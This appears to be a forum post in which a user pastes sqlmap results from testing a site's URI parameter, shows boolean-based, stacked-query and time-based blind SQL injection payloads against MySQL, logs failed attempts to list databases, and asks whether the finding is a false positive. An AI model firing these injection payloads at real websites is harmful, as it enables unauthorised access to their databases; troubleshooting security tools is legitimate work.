Hello,
I get some weird results after checking a site.
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: */191' AND 4356=4356 AND 'JzPr'='JzPr
Vector: AND [INFERENCE]
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: */191'; SELECT SLEEP(5);# AND 'gAjF'='gAjF
Vector: ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: */191' AND SLEEP(5) AND 'lCct'='lCct
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
If I run with --dbs, this is the result:
[14:56:04] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.14
back-end DBMS: MySQL 5.0.11
[14:56:04] [INFO] fetching database names
[14:56:04] [INFO] fetching number of databases
[14:56:04] [DEBUG] resuming configuration option 'optimize' (True)
[14:56:04] [INFO] retrieved:
[14:56:14] [DEBUG] performed 3 queries in 9 seconds
[14:56:14] [ERROR] unable to retrieve the number of databases
[14:56:14] [INFO] falling back to current database
[14:56:14] [INFO] fetching current database
[14:56:14] [INFO] retrieving the length of query output
[14:56:14] [INFO] retrieved:
[14:56:17] [DEBUG] performed 3 queries in 2 seconds
[14:56:17] [DEBUG] starting 3 threads
[14:56:17] [INFO] retrieved:
[14:56:26] [DEBUG] performed 10 queries in 12 seconds
[14:56:26] [CRITICAL] unable to retrieve the database names
Could this be a false positive?
|
